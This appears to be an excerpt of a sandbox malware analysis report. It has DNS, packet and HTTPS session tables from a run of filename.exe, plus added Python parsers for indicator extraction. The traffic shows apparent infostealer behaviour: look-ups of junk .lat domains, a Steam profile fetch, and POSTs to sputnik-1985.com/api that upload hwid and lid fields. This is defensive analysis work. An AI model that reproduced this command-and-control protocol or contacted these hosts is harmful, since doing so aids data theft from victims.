Jan 10, 2025 11:36:09.667207003 CET  53           57859      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.669950008 CET  50835        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.678167105 CET  53           50835      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.680692911 CET  52845        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.687452078 CET  53           52845      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:11.085656881 CET  61360        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:11.096344948 CET  53           61360      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:36.148976088 CET  53           51195      162.159.36.2   192.168.2.3
Jan 10, 2025 11:36:36.663636923 CET  61334        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:36.673310041 CET  53           61334      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:37.877006054 CET  50851        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:37.884334087 CET  53           50851      1.1.1.1        192.168.2.3
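The packet rows in this report arrive with their columns run together: timestamp, then source port, destination port, source IP and destination IP with no separator, and the digit run between the timestamp and the first dot is not always uniquely splittable (49788+443 and 4978+8443 are both valid port pairs). The parser below is an added example, not Joe Sandbox code. It enumerates every split of a row that yields two valid ports and two valid IPv4 addresses, then keeps the one that involves the most hosts already known from the report (the analysis VM 192.168.2.3 and the 1.1.1.1 resolver, an assumed list) and a well-known service port, and refuses a row that stays ambiguous rather than guessing. The sample rows are copied from this report; the remote_endpoints helper turns the parsed rows into the (IP, port) pairs the sample contacted.

```python
# Added example: recover the fused columns of a Joe Sandbox packet table.
import re
from dataclasses import dataclass
from itertools import product

# Assumption: hosts already known from the report (analysis VM, resolver).
KNOWN_HOSTS = {"192.168.2.3", "1.1.1.1"}
# Assumption: a split that puts a well-known service port on one side wins.
WELL_KNOWN_PORTS = {53, 80, 443}

# "Jan 10, 2025 11:36:15.990763903 CET" followed by ports and IPs, no separator.
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)(?P<rest>[\d.]+)$")

# Constructed sample: rows copied from this report (TLS session, DNS over TCP and UDP).
SAMPLE_ROWS = [
    "Jan 10, 2025 11:36:15.990763903 CET49788443192.168.2.3104.21.48.1",
    "Jan 10, 2025 11:36:15.990816116 CET44349788104.21.48.1192.168.2.3",
    "Jan 10, 2025 11:36:36.149585962 CET5770553192.168.2.3162.159.36.2",
    "Jan 10, 2025 11:36:36.154470921 CET5357705162.159.36.2192.168.2.3",
    "Jan 10, 2025 11:36:09.495762110 CET5618453192.168.2.31.1.1.1",
    "Jan 10, 2025 11:36:09.576889992 CET53561841.1.1.1192.168.2.3",
    "Jan 10, 2025 11:36:36.148976088 CET5351195162.159.36.2192.168.2.3",
]


@dataclass(frozen=True)
class Packet:
    timestamp: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _is_octet(s: str) -> bool:
    return s.isdigit() and len(s) <= 3 and (s == "0" or s[0] != "0") and int(s) <= 255


def _is_port(s: str) -> bool:
    return s.isdigit() and len(s) <= 5 and (s == "0" or s[0] != "0") and int(s) <= 65535


def _candidates(ts: str, rest: str) -> set:
    """Every reading of 'srcport dstport a.b.c.d e.f.g.h' consistent with the digits."""
    parts = rest.split(".")
    # Two fused IPv4 addresses give 7 dot-separated fields: field 0 holds both ports
    # plus the first octet of src, field 3 holds the last octet of src plus the first of dst.
    if len(parts) != 7 or not all(_is_octet(parts[i]) for i in (1, 2, 4, 5, 6)):
        return set()
    out = set()
    for i, j in product(range(1, len(parts[0])), range(1, len(parts[3]))):
        head, s1 = parts[0][:i], parts[0][i:]
        s4, d1 = parts[3][:j], parts[3][j:]
        if not (_is_octet(s1) and _is_octet(s4) and _is_octet(d1)):
            continue
        src_ip = ".".join((s1, parts[1], parts[2], s4))
        dst_ip = ".".join((d1, parts[4], parts[5], parts[6]))
        for k in range(1, len(head)):
            p1, p2 = head[:k], head[k:]
            if _is_port(p1) and _is_port(p2):
                out.add(Packet(ts, int(p1), int(p2), src_ip, dst_ip))
    return out


def _score(p: Packet) -> tuple:
    known = sum(ip in KNOWN_HOSTS for ip in (p.src_ip, p.dst_ip))
    service = sum(port in WELL_KNOWN_PORTS for port in (p.src_port, p.dst_port))
    return (known, service)


def parse_packet_row(row: str) -> Packet:
    """Parse one fused row; raise if the digits admit more than one best reading."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    cands = _candidates(m["ts"], m["rest"])
    if not cands:
        raise ValueError(f"no valid port/IP split: {row!r}")
    best = max(_score(c) for c in cands)
    top = [c for c in cands if _score(c) == best]
    if len(top) != 1:
        raise ValueError(f"ambiguous row, add the hosts you know to KNOWN_HOSTS: {row!r}")
    return top[0]


def parse_rows(rows) -> list:
    return [parse_packet_row(r) for r in rows]


def remote_endpoints(packets, host: str = "192.168.2.3") -> list:
    """Sorted (ip, port) pairs the analysis host talked to: the network IOCs of the run."""
    remote = set()
    for p in packets:
        if p.src_ip == host:
            remote.add((p.dst_ip, p.dst_port))
        elif p.dst_ip == host:
            remote.add((p.src_ip, p.src_port))
    return sorted(remote)


if __name__ == "__main__":
    for pkt in parse_rows(SAMPLE_ROWS):
        print(pkt)
    print(remote_endpoints(parse_rows(SAMPLE_ROWS)))
```

The ranking is a heuristic, so the parser raises instead of returning a guess when two readings score the same; extending KNOWN_HOSTS with the other addresses listed in the report is the intended fix when that happens.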
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type                  Class        DNS over HTTPS
Jan 10, 2025 11:36:09.495762110 CET  192.168.2.3  1.1.1.1  0x61fd    Standard query (0)  enterwahsh.biz             A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.581828117 CET  192.168.2.3  1.1.1.1  0x6d26    Standard query (0)  wordyfindy.lat             A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.594357967 CET  192.168.2.3  1.1.1.1  0x62e9    Standard query (0)  slipperyloo.lat            A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.605983973 CET  192.168.2.3  1.1.1.1  0xc69a    Standard query (0)  manyrestro.lat             A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.620028973 CET  192.168.2.3  1.1.1.1  0x620b    Standard query (0)  shapestickyr.lat           A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.630240917 CET  192.168.2.3  1.1.1.1  0x5248    Standard query (0)  talkynicer.lat             A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.644088030 CET  192.168.2.3  1.1.1.1  0xda33    Standard query (0)  curverpluch.lat            A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.658298969 CET  192.168.2.3  1.1.1.1  0x2eec    Standard query (0)  tentabatte.lat             A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.669950008 CET  192.168.2.3  1.1.1.1  0xbc5c    Standard query (0)  bashfulacid.lat            A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:09.680692911 CET  192.168.2.3  1.1.1.1  0x6844    Standard query (0)  steamcommunity.com         A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:11.085656881 CET  192.168.2.3  1.1.1.1  0x5a4     Standard query (0)  sputnik-1985.com           A (IP address)        IN (0x0001)  false
Jan 10, 2025 11:36:36.663636923 CET  192.168.2.3  1.1.1.1  0x12ae    Standard query (0)  198.187.3.20.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false
Jan 10, 2025 11:36:37.877006054 CET  192.168.2.3  1.1.1.1  0x5cbe    Standard query (0)  50.23.12.20.in-addr.arpa   PTR (Pointer record)  IN (0x0001)  false
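The query table shows ten look-ups in under 0.2 s, eight of them under .lat, and the answer table that follows returns Name error (3) for the ones visible in this excerpt; that pattern is what the report's signature "Tries to resolve many domain names, but no domain seems valid" describes. The script below is an added example, not Joe Sandbox code. It joins queries to answers on the DNS transaction ID (the only cleanly delimited field, so the fused IP columns are skipped), summarises the outcome per name, flags a burst of distinct NXDOMAIN names inside a time window, and counts TLDs. The rows are copied from this section (all visible queries, but only the answer rows visible here, so names without one are reported as such); the 5 s window and threshold of 3 are assumptions.

```python
# Added example: NXDOMAIN-burst check over a Joe Sandbox DNS query/answer table.
import re
from datetime import datetime, timezone

TS = r"(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)"
# The fused src/dst IPs are skipped ([\d.]+); the transaction ID is the join key.
QUERY_RE = re.compile(
    TS + r"[\d.]+(?P<txid>0x[0-9a-f]+)[A-Za-z ]+\(\d+\)(?P<name>.+?)"
    r"(?P<type>[A-Z]+ \([^)]*\))IN \(0x[0-9a-f]+\)(?:true|false)$")
ANSWER_RE = re.compile(
    TS + r"[\d.]+(?P<txid>0x[0-9a-f]+)[A-Za-z ]+\((?P<rc>\d+)\).*"
    r"[A-Z]+ \([^)]*\)IN \(0x[0-9a-f]+\)(?:true|false)$")
RCODES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}

# Constructed sample: rows copied from this report.
QUERY_ROWS = [
    "Jan 10, 2025 11:36:09.495762110 CET192.168.2.31.1.1.10x61fdStandard query (0)enterwahsh.bizA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.581828117 CET192.168.2.31.1.1.10x6d26Standard query (0)wordyfindy.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.594357967 CET192.168.2.31.1.1.10x62e9Standard query (0)slipperyloo.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.605983973 CET192.168.2.31.1.1.10xc69aStandard query (0)manyrestro.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.620028973 CET192.168.2.31.1.1.10x620bStandard query (0)shapestickyr.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.630240917 CET192.168.2.31.1.1.10x5248Standard query (0)talkynicer.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.644088030 CET192.168.2.31.1.1.10xda33Standard query (0)curverpluch.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.658298969 CET192.168.2.31.1.1.10x2eecStandard query (0)tentabatte.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.669950008 CET192.168.2.31.1.1.10xbc5cStandard query (0)bashfulacid.latA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.680692911 CET192.168.2.31.1.1.10x6844Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:11.085656881 CET192.168.2.31.1.1.10x5a4Standard query (0)sputnik-1985.comA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:36.663636923 CET192.168.2.31.1.1.10x12aeStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false",
    "Jan 10, 2025 11:36:37.877006054 CET192.168.2.31.1.1.10x5cbeStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false",
]
ANSWER_ROWS = [
    "Jan 10, 2025 11:36:03.388149977 CET1.1.1.1192.168.2.30x3a6dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false",
    "Jan 10, 2025 11:36:03.388149977 CET1.1.1.1192.168.2.30x3a6dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.576889992 CET1.1.1.1192.168.2.30x61fdName error (3)enterwahsh.biznonenoneA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.591504097 CET1.1.1.1192.168.2.30x6d26Name error (3)wordyfindy.latnonenoneA (IP address)IN (0x0001)false",
    "Jan 10, 2025 11:36:09.603127956 CET1.1.1.1192.168.2.30x62e9Name error (3)slipperyloo.latnonenoneA (IP address)IN (0x0001)false",
]


def to_epoch(ts: str) -> float:
    """'Jan 10, 2025 11:36:09.576889992 CET' -> seconds; the zone suffix is ignored
    (one capture, one zone), and the nanosecond fraction is kept."""
    base, frac_tz = ts.split(".", 1)
    frac = frac_tz.split(" ", 1)[0]
    dt = datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(tzinfo=timezone.utc)
    return dt.timestamp() + int(frac) / 10 ** len(frac)


def parse_queries(rows) -> dict:
    """txid -> (epoch, name, record type)."""
    out = {}
    for row in rows:
        m = QUERY_RE.match(row.strip())
        if m:
            out[m["txid"]] = (to_epoch(m["ts"]), m["name"], m["type"].split(" ")[0])
    return out


def parse_answers(rows) -> dict:
    """txid -> (epoch, rcode); a CNAME+A pair shares one txid, so keep the first."""
    out = {}
    for row in rows:
        m = ANSWER_RE.match(row.strip())
        if m:
            out.setdefault(m["txid"], (to_epoch(m["ts"]), int(m["rc"])))
    return out


def resolution_summary(queries, answers) -> dict:
    """name -> rcode label, or a note when the sample holds no answer row for it."""
    summary = {}
    for txid, (_, name, _) in queries.items():
        if txid in answers:
            rc = answers[txid][1]
            summary[name] = RCODES.get(rc, f"rcode {rc}")
        else:
            summary[name] = "no answer row in sample"
    return summary


def nxdomain_bursts(queries, answers, window_s=5.0, threshold=3) -> list:
    """Groups of >= threshold distinct names answered NXDOMAIN within window_s seconds."""
    events = sorted((answers[t][0], name) for t, (_, name, _) in queries.items()
                    if t in answers and answers[t][1] == 3)
    bursts, i = [], 0
    while i < len(events):
        j = i
        while j + 1 < len(events) and events[j + 1][0] - events[i][0] <= window_s:
            j += 1
        names = sorted({n for _, n in events[i:j + 1]})
        if len(names) >= threshold:
            bursts.append(names)
            i = j + 1
        else:
            i += 1
    return bursts


def tld_histogram(queries) -> dict:
    """Count of queried names per top-level label (clustered TLDs are a hunting lead)."""
    hist = {}
    for _, name, _ in queries.values():
        tld = name.rsplit(".", 1)[-1]
        hist[tld] = hist.get(tld, 0) + 1
    return hist


if __name__ == "__main__":
    q, a = parse_queries(QUERY_ROWS), parse_answers(ANSWER_ROWS)
    print(resolution_summary(q, a), nxdomain_bursts(q, a), tld_histogram(q), sep="\n")
```

On a full capture the same join also exposes queries that never got any answer, which a resolver timeout would produce; keep that case separate from NXDOMAIN when tuning the threshold, since only the latter says the name does not exist.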
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 11:36:03.388149977 CET | 1.1.1.1 | 192.168.2.3 | 0x3a6d | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 11:36:03.388149977 CET | 1.1.1.1 | 192.168.2.3 | 0x3a6d | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.576889992 CET | 1.1.1.1 | 192.168.2.3 | 0x61fd | Name error (3) | enterwahsh.biz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.591504097 CET | 1.1.1.1 | 192.168.2.3 | 0x6d26 | Name error (3) | wordyfindy.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.603127956 CET | 1.1.1.1 | 192.168.2.3 | 0x62e9 | Name error (3) | slipperyloo.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.617432117 CET | 1.1.1.1 | 192.168.2.3 | 0xc69a | Name error (3) | manyrestro.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.628998995 CET | 1.1.1.1 | 192.168.2.3 | 0x620b | Name error (3) | shapestickyr.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.640355110 CET | 1.1.1.1 | 192.168.2.3 | 0x5248 | Name error (3) | talkynicer.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.652705908 CET | 1.1.1.1 | 192.168.2.3 | 0xda33 | Name error (3) | curverpluch.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.667207003 CET | 1.1.1.1 | 192.168.2.3 | 0x2eec | Name error (3) | tentabatte.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.678167105 CET | 1.1.1.1 | 192.168.2.3 | 0xbc5c | Name error (3) | bashfulacid.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:09.687452078 CET | 1.1.1.1 | 192.168.2.3 | 0x6844 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:11.096344948 CET | 1.1.1.1 | 192.168.2.3 | 0x5a4 | No error (0) | sputnik-1985.com | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 11:36:36.673310041 CET | 1.1.1.1 | 192.168.2.3 | 0x12ae | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 10, 2025 11:36:37.884334087 CET | 1.1.1.1 | 192.168.2.3 | 0x5cbe | Name error (3) | 50.23.12.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
• steamcommunity.com
• sputnik-1985.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:36:10 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2025-01-10 10:36:10 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Fri, 10 Jan 2025 10:36:10 GMT
Content-Length: 35126
Connection: close
Set-Cookie: sessionid=0d83e256c371627a690beca1; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-10 10:36:10 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-10 10:36:10 UTC | 16384 | IN | Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
2025-01-10 10:36:10 UTC | 3768 | IN | Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
2025-01-10 10:36:10 UTC | 495 | IN | Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:36:11 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: sputnik-1985.com
2025-01-10 10:36:11 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2025-01-10 10:36:12 UTC | 1125 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:36:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l9iemacd7re0804br8hgkbvslq; expires=Tue, 06 May 2025 04:22:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VdKKFVBJb30Lkd4GeZd7XYmqXHUTrNnU0V25h6xn6cu0sFjVGjgyvlyGZ%2BJAIKkZk4O9stCAanu%2F37ypjkHYxeSdjIYlQlny65JZ%2BWZCOh4SKQBl4YB2opaA2CYW%2B2p%2BmD98"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc064cd94d42e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1721&min_rtt=1715&rtt_var=656&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1650650&cwnd=240&unsent_bytes=0&cid=8bad0ec50fb1f3fb&ts=446&x=0"
2025-01-10 10:36:12 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2025-01-10 10:36:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.349762104.21.48.14437512C:\Users\user\Desktop\filename.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 86
                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                            2025-01-10 10:36:12 UTC86OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61
                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea
2025-01-10 10:36:12 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:36:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=l30klo57sfc9ikqrd8tbmdctc0; expires=Tue, 06 May 2025 04:22:51 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F9zgYnO5h6bFhjkX6vI9Yy%2F7qDLeez0uRMyYPPPfWZW4%2FJVjDJPEV89%2BqllJ%2F%2Bgb1dSFMhrTOQTqLor60%2FMlSg3dIIi4bSfnXqKz7h%2Fj8%2FJutoYBSeJD6dXl3GnhWzAPDzV2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc0652bb2ac323-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1454&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=986&delivery_rate=1918528&cwnd=214&unsent_bytes=0&cid=2cdcc3c7a92554a2&ts=462&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:36:14 UTC | 276 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=HDIY54FQBZE5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12833
Host: sputnik-1985.com
2025-01-10 10:36:14 UTC | 12833 | OUT | Data Ascii:
  --HDIY54FQBZE5
  Content-Disposition: form-data; name="hwid"

  C144BB41BBB5F67BBC510B35BBB55F9A
  --HDIY54FQBZE5
  Content-Disposition: form-data; name="pid"

  2
  --HDIY54FQBZE5
  Content-Disposition: form-data; name="lid"

  HpOoIh--2a727a032c4d
  --HDIY54F
2025-01-10 10:36:14 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 10:36:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=2qa90ir11gi4mlurqu3cmq324b; expires=Tue, 06 May 2025 04:22:53 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54hviorsNmkOq1cFv9v5tI2RtQ7K3j2tHEBWtCP7F%2Fe%2BVEnNTZk39bEJBFTiWUHi01%2FIF7gh8FQOGz6gxsCMIkqLI8GnYBWyO%2ByTIjsklHZMqpkWjHNlocCZa6L6J8rBgiv0"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffc065dbe4342e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1756&min_rtt=1754&rtt_var=662&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2839&recv_bytes=13767&delivery_rate=1645997&cwnd=240&unsent_bytes=0&cid=b8772e5600d1c33f&ts=421&x=0"
2025-01-10 10:36:14 UTC | 20 | IN | Data Ascii: f\r\nok 8.46.123.189\r\n (chunked body: one 0xf-byte chunk)
2025-01-10 10:36:14 UTC | 5 | IN | Data Ascii: 0\r\n\r\n (terminating zero-length chunk)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.3 | 49779 | 104.21.48.1 | 443 | 7512 | C:\Users\user\Desktop\filename.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 10:36:15 UTC | 280 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=9PRQ9RE77OAYR9AA
